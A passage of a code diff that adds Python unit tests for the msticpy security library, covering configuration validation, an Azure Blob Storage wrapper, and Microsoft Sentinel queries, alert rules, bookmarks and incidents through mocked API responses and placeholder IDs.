+            i_type, i_opts = get_defn_or_default(item_def)
+            check.equal(i_type, "bool")
+            check.is_in(i_opts["default"], (True, False))
+
+
+TEST_PATH_WS3 = "AzureSentinel.Workspaces.TestWS2"
+NEW_WS2 = {
+    "WorkspaceId": "a927809c-8142-43e1-96b3-4ad87cfe95a3",
+    "TenantId": "69d28fd7-42a5-48bc-a619-af56397b9f28",
+}
+_VALIDATION_CASES = [
+    pytest.param((TEST_PATH_WS3, NEW_WS2), 0, id="Workspace OK"),
+    pytest.param(
+        (TEST_PATH_WS3, {"WorkspaceId": NEW_WS2["WorkspaceId"]}),
+        1,
+        id="WS missing tenantID",
+    ),
+    pytest.param(
+        (TEST_PATH_WS3, {"WorkspaceId": "not_a_uuid"}), 2, id="WS WorkspaceID not UUID"
+    ),
+    pytest.param(("TIProviders.OTX.Args.AuthKey", "KeyValue"), 0, id="OTX OK"),
+    pytest.param(
+        ("TIProviders.OTX.Args.AuthKey", {"InvalidKey": "KeyValue"}),
+        1,
+        id="OTX invalid credkey",
+    ),
+    pytest.param(
+        ("DataProviders.AzureCLI.Args.auth_methods", ["cli"]),
+        0,
+        id="AzCLI OK - meth list",
+    ),
+    pytest.param(
+        ("DataProviders.AzureCLI.Args.auth_methods", None), 0, id="AzCLI OK - no meths"
+    ),
+    pytest.param(
+        ("DataProviders.AzureCLI.Args.auth_methods", ["cli", "badmeth"]),
+        1,
+        id="AzCLI bad enum",
+    ),
+    pytest.param(("DataProviders.Splunk.Args.sharing", None), 0, id="Splunk OK"),
+    pytest.param(
+        ("DataProviders.Splunk.Args.sharing", "global"), 0, id="Splunk OK def value"
+    ),
+    pytest.param(
+        ("DataProviders.Splunk.Args.sharing", "badval"), 1, id="Splunk bad enum"
+    ),
+    pytest.param(
+        ("DataProviders.LocalData.data_paths", None), 0, id="LocalData OK - None"
+    ),
+    pytest.param(
+        ("DataProviders.LocalData.data_paths", ["/path1", "e:\\path\\path2"]),
+        0,
+        id="LocalData OK - List",
+    ),
+    pytest.param(
+        ("DataProviders.LocalData.data_paths", "badval"), 1, id="LocalData str"
+    ),
+    pytest.param(
+        ("DataProviders.Mordor.save_folder", None), 0, id="Mordor save_folder OK - None"
+    ),
+    pytest.param(
+        ("DataProviders.Mordor.save_folder", "e:\\path\\path2"),
+        0,
+        id="Mordor save_folder OK - path",
+    ),
+    pytest.param(
+        ("DataProviders.Mordor.save_folder", True), 1, id="Mordor save_folder - bool"
+    ),
+    pytest.param(
+        ("DataProviders.LocalData.data_paths", "badval"), 1, id="LocalData str"
+    ),
+    pytest.param(
+        (
+            "UserDefaults.LoadComponents.Notebooklets.query_provider.AzureSentinel",
+            {"workspace": "Default"},
+        ),
+        0,
+        id="Load Notebooklets OK",
+    ),
+    pytest.param(
+        ("UserDefaults.LoadComponents.Notebooklets.query_provider.AzureSentinel", None),
+        1,
+        id="Load Notebooklets None",
+    ),
+    pytest.param(
+        (
+            "UserDefaults.LoadComponents.Notebooklets.query_provider.AzureSentinel",
+            "not_a_kv_pair",
+        ),
+        1,
+        id="Load Notebooklets bad kv pair",
+    ),
+]
+
+
+@pytest.mark.parametrize(["test_case", "expected"], _VALIDATION_CASES)
+def test_mp_config_controls_validation(mp_conf_ctrl, test_case, expected):
+    """Test validation functions."""
+    path, test_value = test_case
+    curr_val = mp_conf_ctrl.get_value(path)
+    mp_conf_ctrl.set_value(path, test_value)
+    if path == TEST_PATH_WS3:
+        wksp_stem = path.rsplit(".", maxsplit=1)[0]
+        results = mp_conf_ctrl.validate_setting(path, f"{wksp_stem}.Default")
+    else:
+        results = mp_conf_ctrl.validate_setting(path)
+
+    check.equal(len(results), expected)
+    print(results)
+    mp_conf_ctrl.set_value(path, curr_val)
diff --git a/tests/config/test_mp_config_edit.py b/tests/config/test_mp_config_edit.py
new file mode 100644
index 000000000..28462021f
--- /dev/null
+++ b/tests/config/test_mp_config_edit.py
@@ -0,0 +1,139 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module docstring."""
+from copy import deepcopy
+from datetime import datetime
+from pathlib import Path
+
+import pytest
+import pytest_check as check
+import yaml
+import ipywidgets as widgets
+from msticpy.config.comp_edit import (
+    CEItemsBase,
+    CompEditItems,
+    CompEditStatusMixin,
+)
+from msticpy.config.ce_simple_settings import CESimpleSettings
+from msticpy.config.mp_config_edit import MpConfigEdit
+from msticpy.config.mp_config_file import MpConfigFile
+
+from ..unit_test_lib import TEST_DATA_PATH, custom_mp_config
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name
+
+
+@pytest.fixture
+def mp_edit():
+    """Get instantiated editor."""
+    CompEditStatusMixin.testing = True
+    return MpConfigEdit()
+
+
+def _check_tab_state(mp_edit_control, enabled, dummy):
+    """Check the current lazy-load status of the tabs."""
+    ce_controls = dummy_controls = 0
+    for tab in mp_edit_control.controls.values():
+        if isinstance(tab, widgets.Label):
+            dummy_controls += 1
+        else:
+            ce_controls += 1
+    check.equal(ce_controls, enabled, "One control initialized")
+    check.equal(dummy_controls, dummy, "Rest of controls are dummy")
+
+
+def test_mp_edit_load(mp_edit):
+    """Creating instance of MpConfigEdit."""
+    _check_tab_state(mp_edit, enabled=1, dummy=(len(mp_edit.controls) - 1))
+    # since the tab controls are loaded lazily, we need to
+    # select each tab to force loading
+    for tab_name in mp_edit.tab_names:
+        mp_edit.tab_ctrl.set_tab(tab_name)
+
+    _check_tab_state(mp_edit, enabled=len(mp_edit.controls), dummy=0)
+
+    for idx, (title, tab) in enumerate(mp_edit.controls.items()):
+
+        check.equal(mp_edit.tab_ctrl.tab.get_title(idx), title)
+
+        check.is_instance(tab, (CEItemsBase, CESimpleSettings))
+
+        check.is_true(hasattr(tab, "layout"))
+        check.is_true(hasattr(tab, "help"))
+        check.is_true(hasattr(tab, "status"))
+        check.is_true(hasattr(tab, "edit_frame"))
+
+        if isinstance(tab, CompEditItems):
+            check.is_true(hasattr(tab, "items_frame"))
+            check.is_true(hasattr(tab, "edit_buttons"))
+            check.is_true(hasattr(tab, "select_item"))
+        else:
+            check.is_true(hasattr(tab, "btn_save"))
+
+        check.is_true(tab.help.html_help.value)
+        check.is_in(
+            "https://msticpy.readthedocs.io/en/latest", tab.help.html_help.value
+        )
+
+        mp_edit.btn_validate.click()
+
+        test_file = f"./temp_config{datetime.now().strftime('%H%M%S')}.yaml"
+        mp_edit.txt_current_file.value = test_file
+        mp_edit.btn_save.click()
+        check.is_true(Path(test_file).is_file())
+        Path(test_file).unlink()
+
+
+def test_mp_edit_load_params():
+    """Test different startup params for MpConfigEdit."""
+    config_path = Path(TEST_DATA_PATH).joinpath("msticpyconfig.yaml")
+    with open(config_path, "r", encoding="utf-8") as conf_fh:
+        settings = yaml.safe_load(conf_fh)
+
+    orig_settings = deepcopy(settings)
+    orig_resgroup = orig_settings["AzureSentinel"]["Workspaces"]["Default"].get(
+        "ResourceGroup"
+    )
+
+    # edit the settings so we know that we're checking the same data
+    # - not the default
+    settings["AzureSentinel"]["Workspaces"]["Default"]["ResourceGroup"] = "TestMarker"
+
+    test_path = "AzureSentinel.Workspaces.Default.ResourceGroup"
+
+    # pass MpConfigFile instance
+    mpc_file = MpConfigFile(settings=settings)
+    mp_conf = MpConfigEdit(settings=mpc_file)
+    check.equal(mp_conf.mp_controls.mp_config, settings, "MpConfigFile")
+    check.equal(mp_conf.mp_controls.get_value(test_path), "TestMarker", "File path")
+
+    # pass settings dict
+    mp_conf = MpConfigEdit(settings=mpc_file.settings)
+    check.equal(mp_conf.mp_controls.mp_config, settings, "Settings dict")
+    check.equal(mp_conf.mp_controls.get_value(test_path), "TestMarker", "File path")
+
+    # In these last tests we can't check for dict equality since MpConfigEdit
+    # adds blank values for top level keys
+
+    # pass file_path
+    mp_conf = MpConfigEdit(settings=str(config_path))
+    check.is_false(
+        orig_settings.keys() - mp_conf.mp_controls.mp_config.keys(), "File path"
+    )
+    check.equal(mp_conf.mp_controls.get_value(test_path), orig_resgroup, "Default")
+    for key in orig_settings.keys():
+        check.equal(orig_settings[key], mp_conf.mp_controls.mp_config[key])
+
+    with custom_mp_config(str(config_path)):
+        mp_conf = MpConfigEdit()
+        check.equal(mp_conf.mp_controls.get_value(test_path), orig_resgroup, "Default")
+        check.is_false(
+            orig_settings.keys() - mp_conf.mp_controls.mp_config.keys(), "Default"
+        )
+        for key in orig_settings.keys():
+            check.equal(orig_settings[key], mp_conf.mp_controls.mp_config[key])
diff --git a/tests/data/__init__.py b/tests/data/__init__.py
new file mode 100644
index 000000000..6ea13d44c
--- /dev/null
+++ b/tests/data/__init__.py
@@ -0,0 +1,6 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Init for test package."""
diff --git a/tests/data/azure/test_azure_blob_storage.py b/tests/data/azure/test_azure_blob_storage.py
new file mode 100644
index 000000000..0344ceed2
--- /dev/null
+++ b/tests/data/azure/test_azure_blob_storage.py
@@ -0,0 +1,184 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Azure Sentinel unit tests."""
+from collections import namedtuple
+import datetime
+from unittest.mock import patch
+
+import pandas as pd
+
+from msticpy.data.azure import AzureBlobStorage
+
+
+_CONTAINERS = [
+    {
+        "name": "test",
+        "last_modified": datetime.datetime(
+            2020, 11, 6, 21, 53, 33, tzinfo=datetime.timezone.utc
+        ),
+        "etag": '"0x00000000000000001"',
+        "lease": {"status": "unlocked", "state": "available", "duration": None},
+        "public_access": None,
+        "has_immutability_policy": False,
+        "deleted": None,
+        "version": None,
+        "has_legal_hold": False,
+        "metadata": None,
+        "encryption_scope": "Test",
+    }
+]
+_BLOBS = [
+    {
+        "name": "test.blob",
+        "container": "test",
+        "snapshot": None,
+        "version_id": None,
+        "is_current_version": None,
+        "blob_type": "test",
+        "metadata": {},
+        "encrypted_metadata": None,
+        "last_modified": datetime.datetime(
+            2020, 11, 9, 1, 24, 52, tzinfo=datetime.timezone.utc
+        ),
+        "etag": "0x0000000000001",
+        "size": 38630,
+        "content_range": None,
+        "append_blob_committed_block_count": None,
+        "is_append_blob_sealed": None,
+        "page_blob_sequence_number": None,
+        "server_encrypted": True,
+        "copy": {
+            "id": None,
+            "source": None,
+            "status": None,
+            "progress": None,
+            "completion_time": None,
+            "status_description": None,
+            "incremental_copy": None,
+            "destination_snapshot": None,
+        },
+        "content_settings": {
+            "content_type": "application/octet-stream",
+            "content_encoding": None,
+            "content_language": None,
+            "content_md5": bytearray(b"test"),
+            "content_disposition": None,
+            "cache_control": None,
+        },
+        "lease": {"status": "unlocked", "state": "available", "duration": None},
+        "blob_tier": "Hot",
+        "rehydrate_priority": None,
+        "blob_tier_change_time": None,
+        "blob_tier_inferred": True,
+        "deleted": None,
+        "deleted_time": None,
+        "remaining_retention_days": None,
+        "creation_time": datetime.datetime(
+            2020, 11, 9, 1, 24, 52, tzinfo=datetime.timezone.utc
+        ),
+        "archive_status": None,
+        "encryption_key_sha256": None,
+        "encryption_scope": None,
+        "request_server_encrypted": None,
+        "object_replication_source_properties": [],
+        "object_replication_destination_policy": None,
+        "tag_count": None,
+        "tags": None,
+    }
+]
+
+
+class _DummyContainerClient:
+    def get_container_properties(self):
+        return _CONTAINERS[0]
+
+    def list_blobs(self):
+        return _BLOBS
+
+
+class _DummyBlobClient:
+    def upload_blob(self, blob, overwrite):
+        return {"error_code": None}
+
+    def exists(self):
+        return True
+
+    def download_blob(self):
+        return _DummyContent()
+
+    def delete_blob(self, delete_snapshots):
+        pass
+
+
+class _DummyContent:
+    def content_as_bytes(self):
+        return "test_data"
+
+
+def test_abs_init():
+    """Test class initalization."""
+    azs = AzureBlobStorage("Test")
+    assert isinstance(azs, AzureBlobStorage)
+
+
+@patch(AzureBlobStorage.__module__ + ".BlobServiceClient")
+@patch(AzureBlobStorage.__module__ + ".az_connect")
+def test_abs_containers(mock_creds, mock_abs_client):
+    """Test abs container feature."""
+    AzCredentials = namedtuple("AzCredentials", ["legacy", "modern"])
+    mock_abs_client().list_containers.return_value = _CONTAINERS
+    mock_abs_client().create_container.return_value = _DummyContainerClient()
+    mock_creds.return_value = AzCredentials("cred", "cred")
+    abs = AzureBlobStorage("Test")
+    abs.connect()
+    containers = abs.containers()
+    assert isinstance(containers, pd.DataFrame)
+    assert containers.iloc[0]["name"] == "test"
+    new_container = abs.create_container("test")
+    assert isinstance(new_container, pd.DataFrame)
+    assert new_container.iloc[0]["name"] == "test"
+
+
+@patch(AzureBlobStorage.__module__ + ".BlobServiceClient")
+@patch(AzureBlobStorage.__module__ + ".az_connect")
+def test_abs_blobs(mock_creds, mock_abs_client):
+    """Test abs blob feature."""
+    AzCredentials = namedtuple("AzCredentials", ["legacy", "modern"])
+    mock_abs_client().get_container_client.return_value = _DummyContainerClient()
+    mock_abs_client().get_blob_client.return_value = _DummyBlobClient()
+    mock_creds.return_value = AzCredentials("cred", "cred")
+    abs = AzureBlobStorage("Test")
+    abs.connect()
+    blobs = abs.blobs("test")
+    assert isinstance(blobs, pd.DataFrame)
+    assert blobs.iloc[0]["name"] == "test.blob"
+    upload = abs.upload_to_blob(
+        "test_data", "test_container", "test_blob", overwrite=False
+    )
+    assert upload is True
+    delete = abs.delete_blob("test_container", "test_blob")
+    assert delete is True
+    blob_data = abs.get_blob("test_container", "test_blob")
+    assert blob_data == "test_data"
+
+
+@patch(AzureBlobStorage.__module__ + ".BlobServiceClient")
+@patch(AzureBlobStorage.__module__ + ".az_connect")
+@patch(AzureBlobStorage.__module__ + ".generate_blob_sas")
+def test_sas_token_creation(mock_sas_token, mock_creds, mock_abs_client):
+    AzCredentials = namedtuple("AzCredentials", ["legacy", "modern"])
+    mock_abs_client().get_user_delegation_key.return_value = "Test_Key"
+    mock_abs_client().account_name = "test_name"
+    mock_sas_token.return_value = "TestSASToken"
+    mock_creds.return_value = AzCredentials("cred", "cred")
+    abs = AzureBlobStorage("test")
+    abs.connect()
+    path = abs.get_sas_token("test_container", "test_blob")
+    # assert isinstance(str, path)
+    assert (
+        path
+        == "https://test_name.blob.core.windows.net/test_container/test_blob?TestSASToken"
+    )
diff --git a/tests/data/azure/test_sentinel_analytics.py b/tests/data/azure/test_sentinel_analytics.py
new file mode 100644
index 000000000..77b9ee674
--- /dev/null
+++ b/tests/data/azure/test_sentinel_analytics.py
@@ -0,0 +1,148 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Azure Sentinel unit tests."""
+import re
+from unittest.mock import patch
+
+import pandas as pd
+import pytest
+import respx
+from msticpy.data.azure import MicrosoftSentinel
+
+_HUNTING_QUERIES = {
+    "__metadata": {},
+    "value": [
+        {
+            "id": "subscriptions/123/resourceGroups/RG/providers/Microsoft.OperationalInsights/workspaces/WSNAME/savedSearches/123",
+            "etag": "Tag",
+            "properties": {
+                "Category": "Hunting Queries",
+                "DisplayName": "HuntingQuery",
+                "Query": "QueryText",
+                "Tags": [
+                    {"Name": "description", "Value": ""},
+                    {"Name": "tactics", "Value": ""},
+                    {"Name": "t-skang@microsoft.com", "Value": "false"},
+                ],
+                "Version": 2,
+            },
+            "name": "123",
+            "type": "Microsoft.OperationalInsights/savedSearches",
+        }
+    ],
+}
+_ALERT_RULES = {
+    "value": [
+        {
+            "id": "/subscriptions/123/resourceGroups/RG/providers/Microsoft.OperationalInsights/workspaces/WSName/providers/Microsoft.SecurityInsights/alertRules/123",
+            "name": "123",
+            "etag": '"123"',
+            "type": "Microsoft.SecurityInsights/alertRules",
+            "kind": "Scheduled",
+            "properties": {
+                "severity": "Medium",
+                "query": "AlertText",
+                "queryFrequency": "PT5H",
+                "queryPeriod": "PT5H",
+                "triggerOperator": "GreaterThan",
+                "triggerThreshold": 5,
+                "suppressionDuration": "PT5H",
+                "suppressionEnabled": False,
+                "incidentConfiguration": {
+                    "createIncident": True,
+                    "groupingConfiguration": {
+                        "enabled": False,
+                        "reopenClosedIncident": False,
+                        "lookbackDuration": "PT5H",
+                        "entitiesMatchingMethod": "All",
+                        "groupByEntities": [],
+                    },
+                },
+                "eventGroupingSettings": {"aggregationKind": "SingleAlert"},
+                "displayName": "Suspect logon from an IP address recently seen targeting a honeypot",
+                "enabled": True,
+                "description": "A successful Azure Active Directory sign-in event originates from an IP address seen accessing a storage honeybucket!",
+                "tactics": ["InitialAccess"],
+                "alertRuleTemplateName": None,
+                "lastModifiedUtc": "2020-04-01T15:00:57.6401532Z",
+            },
+        }
+    ]
+}
+
+
+@pytest.fixture(scope="module")
+@patch(MicrosoftSentinel.__module__ + ".MicrosoftSentinel.connect")
+def sent_loader(mock_creds):
+    """Generate MicrosoftSentinel for testing."""
+    mock_creds.return_value = None
+    sent = MicrosoftSentinel(
+        sub_id="fd09863b-5cec-4833-ab9c-330ad07b0c1a", res_grp="RG", ws_name="WSName"
+    )
+    sent.connect()
+    sent.token = "fd09863b-5cec-4833-ab9c-330ad07b0c1a"
+    return sent
+
+
+@respx.mock
+def test_sent_hunting_queries(sent_loader):
+    """Test Sentinel hunting feature."""
+    respx.get(re.compile("https://management.azure.com/.*")).respond(
+        200, json=_HUNTING_QUERIES
+    )
+    hqs = sent_loader.list_hunting_queries()
+    assert isinstance(hqs, pd.DataFrame)
+    assert hqs["properties.Query"].iloc[0] == "QueryText"
+
+
+@respx.mock
+def test_sent_alert_rules(sent_loader):
+    """Test Sentinel alert feature."""
+    respx.get(re.compile("https://management.azure.com/.*")).respond(
+        200, json=_ALERT_RULES
+    )
+    alerts = sent_loader.list_alert_rules()
+    assert isinstance(alerts, pd.DataFrame)
+    assert alerts["properties.query"].iloc[0] == "AlertText"
+
+
+@respx.mock
+def test_sent_analytic_create(sent_loader):
+    """Test Sentinel analytics feature."""
+    respx.put(re.compile("https://management.azure.com/.*/alertRules/.*")).respond(201)
+    respx.get(re.compile("https://management.azure.com/.*/alertRuleTemplates")).respond(
+        200,
+        json={
+            "value": [
+                {
+                    "name": "508f3c50-f6d3-45b3-8321-fb674afe3478",
+                    "properties": {
+                        "displayName": "Test Bookmark",
+                        "query": "SecurityAlert | take 10",
+                        "queryFrequency": "PT1H",
+                        "queryPeriod": "PT1H",
+                        "severity": "Low",
+                        "triggerOperator": "GreaterThan",
+                        "triggerThreshold": 0,
+                        "description": "Test Template",
+                        "tactics": ["test1"],
+                    },
+                }
+            ]
+        },
+    )
+    sent_loader.create_analytic_rule("508f3c50-f6d3-45b3-8321-fb674afe3478")
+    sent_loader.create_analytic_rule("Test Bookmark")
+    sent_loader.create_analytic_rule(name="Test Rule", query="SecurityAlert | take 10")
+
+
+@respx.mock
+def test_sent_analytics_delete(sent_loader):
+    """Test Sentinel analytics feature."""
+    respx.delete(re.compile("https://management.azure.com/.*/alertRules/.*")).respond(
+        200
+    )
+    sent_loader.delete_analytic_rule("508f3c50-f6d3-45b3-8321-fb674afe3478")
diff --git a/tests/data/azure/test_sentinel_bookmarks.py b/tests/data/azure/test_sentinel_bookmarks.py
new file mode 100644
index 000000000..dce496297
--- /dev/null
+++ b/tests/data/azure/test_sentinel_bookmarks.py
@@ -0,0 +1,95 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Azure Sentinel unit tests."""
+import re
+from unittest.mock import patch
+
+import pandas as pd
+import pytest
+import respx
+from msticpy.data.azure import MicrosoftSentinel
+
+_BOOKMARK = {
+    "value": [
+        {
+            "id": "/subscriptions/123/resourceGroups/RG/providers/Microsoft.OperationalInsights/workspaces/WSName/providers/Microsoft.SecurityInsights/Bookmarks/123",
+            "name": "Bookmark Test",
+            "etag": '"123"',
+            "type": "Microsoft.SecurityInsights/Bookmarks",
+            "properties": {
+                "displayName": "Bookmark Test",
+                "created": "2020-04-27T16:55:02.8309802+00:00",
+                "updated": "2020-04-27T16:55:02.8309802+00:00",
+                "createdBy": {
+                    "objectId": "123",
+                    "email": "user@microsoft.com",
+                    "name": "123",
+                },
+                "updatedBy": {
+                    "objectId": "123",
+                    "email": "user@microsoft.com",
+                    "name": "123",
+                },
+                "eventTime": "2020-04-27T16:55:02.8309802+00:00",
+                "labels": [],
+                "query": "SecurityAlert\n| take 10\n",
+                "queryResult": '{"TenantId":"52b1ab41-869e-4138-9e40-2a4457f09bf0","TimeGenerated":"2020-04-27T15:34:02Z","DisplayName":"Matches on commands seen in honeypot data","AlertName":"Matches on commands seen in honeypot data","AlertSeverity":"Medium","Description":"Looks for matches of Linux commands from auditd logs against \\nLinux commands sourced from \\nMicrosoft Threat Intelligence Center honeypot data.","ProviderName":"ASI Scheduled Alerts","VendorName":"Microsoft","VendorOriginalId":"393fe624-418f-44ea-92b1-1a18f7d19555","SystemAlertId":"8a22c48c-e583-41d7-a178-276d21925af0","ResourceId":"","SourceComputerId":"","AlertType":"52b1ab41-869e-4138-9e40-2a4457f09bf0_a35a8534-0b12-4138-8e00-83c5c68dc647","ConfidenceLevel":"Unknown","ConfidenceScore":null,"IsIncident":"false","StartTime":"2020-04-27T14:38:24Z","EndTime":"2020-04-27T14:38:24Z","ProcessingEndTime":"2020-04-27T15:34:02Z","RemediationSteps":"","ExtendedProperties":"{\\r\\n  \\"Query\\": \\"// Time scope parameters (in UTC format) were prepended to the query to reflect the time window on which the rule ran when the alert was triggered.\\\\n// To change the time scope, remove the set statements and select a new time range.\\\\nset query_datetimescope_column = \\\\\\"TimeGenerated\\\\\\";\\\\nset query_datetimescope_from = datetime(4/27/2020 10:28:54 AM);\\\\nset query_datetimescope_to = datetime(4/27/2020 3:28:54 PM);\\\\nSyslog \\\\r\\\\n| where TimeGenerated >= (datetime(4/27/2020 3:28:54 PM)-(7d)) \\\\r\\\\n| take 1\\",\\r\\n  \\"Query Period\\": \\"05:00:00\\",\\r\\n  \\"Query Start Time UTC\\": \\"2020-04-27 10:28:54Z\\",\\r\\n  \\"Query End Time UTC\\": \\"2020-04-27 15:28:54Z\\",\\r\\n  \\"Trigger Operator\\": \\"GreaterThan\\",\\r\\n  \\"Trigger Threshold\\": \\"0\\",\\r\\n  \\"Query Results Aggregation Kind\\": \\"SingleAlert\\",\\r\\n  \\"Search Query Results Overall Count\\": \\"1\\"\\r\\n}","Entities":"","SourceSystem":"Detection","WorkspaceSubscriptionId":"40dcc8bf-0478-4f3b-b275-ed0a94f2c013","WorkspaceResourceGroup":"asihuntomsworkspacerg","ExtendedLinks":"","ProductName":"Azure Sentinel","ProductComponentName":"Scheduled Alerts","AlertLink":"","Type":"SecurityAlert","__entityMapping":{}}',
+                "queryStartTime": "2020-04-26T16:54:49.439+00:00",
+                "queryEndTime": "2020-04-27T16:54:49.439+00:00",
+                "incidentInfo": {
+                    "incidentId": "9f63476e-3605-4377-a415-7626fdda46f3",
+                    "title": "SecurityAlert - 123",
+                    "relationName": "123",
+                    "severity": "Medium",
+                },
+            },
+        }
+    ]
+}
+
+
+@pytest.fixture(scope="module")
+@patch(MicrosoftSentinel.__module__ + ".MicrosoftSentinel.connect")
+def sent_loader(mock_creds):
+    """Generate MicrosoftSentinel for testing."""
+    mock_creds.return_value = None
+    sent = MicrosoftSentinel(
+        sub_id="fd09863b-5cec-4833-ab9c-330ad07b0c1a", res_grp="RG", ws_name="WSName"
+    )
+    sent.connect()
+    sent.token = "fd09863b-5cec-4833-ab9c-330ad07b0c1a"
+    return sent
+
+
+@respx.mock
+def test_sent_bookmarks(sent_loader):
+    """Test Sentinel bookmarks feature."""
+    respx.get(re.compile("https://management.azure.com/.*")).respond(
+        200, json=_BOOKMARK
+    )
+    bkmarks = sent_loader.list_bookmarks()
+    assert isinstance(bkmarks, pd.DataFrame)
+    assert bkmarks["name"].iloc[0] == "Bookmark Test"
+
+
+@respx.mock
+def test_sent_bookmark_create(sent_loader):
+    """Test Sentinel bookmark creation."""
+    respx.put(re.compile("https://management.azure.com/.*")).respond(200, json={})
+    sent_loader.create_bookmark(
+        name="Test Bookmark",
+        query="SecurityAlert | take 10",
+        results="DataFrame",
+        notes="Some notes",
+        labels=["Label1"],
+    )
+
+
+@respx.mock
+def test_sent_bookmark_delete(sent_loader):
+    """Test Sentinel bookmark deletion."""
+    respx.delete(re.compile("https://management.azure.com/.*")).respond(200, json={})
+    sent_loader.delete_bookmark("a55463ed-dce0-4ba4-83ca-6f6d0e5d5acf")
diff --git a/tests/data/azure/test_sentinel_core.py b/tests/data/azure/test_sentinel_core.py
new file mode 100644
index 000000000..596864ff4
--- /dev/null
+++ b/tests/data/azure/test_sentinel_core.py
@@ -0,0 +1,71 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Azure Sentinel unit tests."""
+import re
+from unittest.mock import patch
+
+import pandas as pd
+import pytest
+import respx
+from azure.core.exceptions import ClientAuthenticationError
+from msticpy.data.azure import AzureData
+from msticpy.data.azure import MicrosoftSentinel
+
+# pylint: disable=redefined-outer-name
+
+_RESOURCES = pd.DataFrame(
+    {
+        "resource_type": [
+            "Microsoft.OperationsManagement/solutions",
+            "Microsoft.OperationsManagement/solutions",
+            "Microsoft.Insights/components",
+        ],
+        "name": ["SecurityInsightsTest1", "Test2", "Test3"],
+        "resource_id": ["123", "456", "789"],
+    }
+)
+_RESOURCE_DETAILS = {"properties": {"workspaceResourceId": "ABC"}}
+
+
+def test_azuresent_init():
+    """Test class initalization."""
+    azs = MicrosoftSentinel(sub_id="123", res_grp="RG", ws_name="WSName")
+    assert isinstance(azs, MicrosoftSentinel)
+    azs = MicrosoftSentinel(
+        res_id="subscriptions/123/resourceGroups/RG/providers/Microsoft.OperationalInsights/workspaces/WSNAME"
+    )
+    assert isinstance(azs, MicrosoftSentinel)
+
+
+def test_azuresent_connect_exp():
+    """Test connect failure."""
+    with pytest.raises(ClientAuthenticationError):
+        azs = MicrosoftSentinel(
+            res_id="subscriptions/123/resourceGroups/RG/providers/Microsoft.OperationalInsights/workspaces/WSNAME"
+        )
+        azs.connect(auth_methods=["env"])
+
+
+@pytest.fixture(scope="module")
+@patch(MicrosoftSentinel.__module__ + ".MicrosoftSentinel.connect")
+def azs_loader(mock_creds):
+    """Generate MicrosoftSentinel for testing."""
+    mock_creds.return_value = None
+    azs = MicrosoftSentinel(sub_id="123", res_grp="RG", ws_name="WSName")
+    azs.connect()
+    azs.token = "123"
+    return azs
+
+
+@patch(AzureData.__module__ + ".AzureData.get_resources")
+@patch(AzureData.__module__ + ".AzureData.get_resource_details")
+def test_azuresent_workspaces(mock_res_dets, mock_res, azs_loader):
+    """Test Sentinel workspaces feature."""
+    mock_res.return_value = _RESOURCES
+    mock_res_dets.return_value = _RESOURCE_DETAILS
+    workspaces = azs_loader.get_sentinel_workspaces(sub_id="123")
+    assert isinstance(workspaces, dict)
+    assert workspaces["ABC"] == "ABC"
diff --git a/tests/data/azure/test_sentinel_incidents.py b/tests/data/azure/test_sentinel_incidents.py
new file mode 100644
index 000000000..055c2e674
--- /dev/null
+++ b/tests/data/azure/test_sentinel_incidents.py
@@ -0,0 +1,205 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Azure Sentinel unit tests."""
+import re
+from typing import List
+from unittest.mock import patch
+
+import pandas as pd
+import pytest
+import respx
+from msticpy.data.azure import MicrosoftSentinel
+
+_INCIDENT = {
+    "value": [
+        {
+            "id": "/subscriptions/123/resourceGroups/RG/providers/Microsoft.OperationalInsights/workspaces/WSName/providers/Microsoft.SecurityInsights/Incidents/13ffba29-971c-4d70-9cb4-ddd0ec1bbb84",
+            "name": "13ffba29-971c-4d70-9cb4-ddd0ec1bbb84",
+            "etag": '"0b0013eb-0000-0a00-0000-5fab48a40000"',
+            "type": "Microsoft.SecurityInsights/Incidents",
+            "properties": {
+                "title": "Test Incident",
+                "description": "Test",
+                "severity": "Medium",
+                "status": "New",
+                "owner": {
+                    "objectId": "null",
+                    "email": "null",
+                    "assignedTo": "null",
+                    "userPrincipalName": "null",
+                },
+                "labels": [],
+                "firstActivityTimeUtc": "2020-11-10T21:07:48.2446898Z",
+                "lastActivityTimeUtc": "2020-11-11T02:07:48.2446898Z",
+                "lastModifiedTimeUtc": "2020-11-11T02:12:52.389123Z",
+                "createdTimeUtc": "2020-11-11T02:12:52.389123Z",
+                "incidentNumber": 44271,
+                "additionalData": {
+                    "alertsCount": 1,
+                    "bookmarksCount": 0,
+                    "commentsCount": 0,
+                    "alertProductNames": ["Azure Sentinel"],
+                    "tactics": [],
+                },
+                "firstActivityTimeGenerated": "2020-11-11T02:12:52.1908593Z",
+                "lastActivityTimeGenerated": "2020-11-11T02:12:52.1908593Z",
+                "relatedAnalyticRuleIds": [
+                    "/subscriptions/123/resourceGroups/RG/providers/Microsoft.OperationalInsights/workspaces/WSName/providers/Microsoft.SecurityInsights/alertRules/494bfb7c-e436-483d-800d-8385068c2e49"
+                ],
+                "incidentUrl": "https://portal.azure.com/#asset/Microsoft_Azure_Security_Insights/Incident/subscriptions/123/resourceGroups/RG/providers/Microsoft.OperationalInsights/workspaces/WSName/providers/Microsoft.SecurityInsights/Incidents/13ffba29-971c-4d70-9cb4-ddd0ec1bbb84",
+            },
+        },
+    ]
+}
+
+
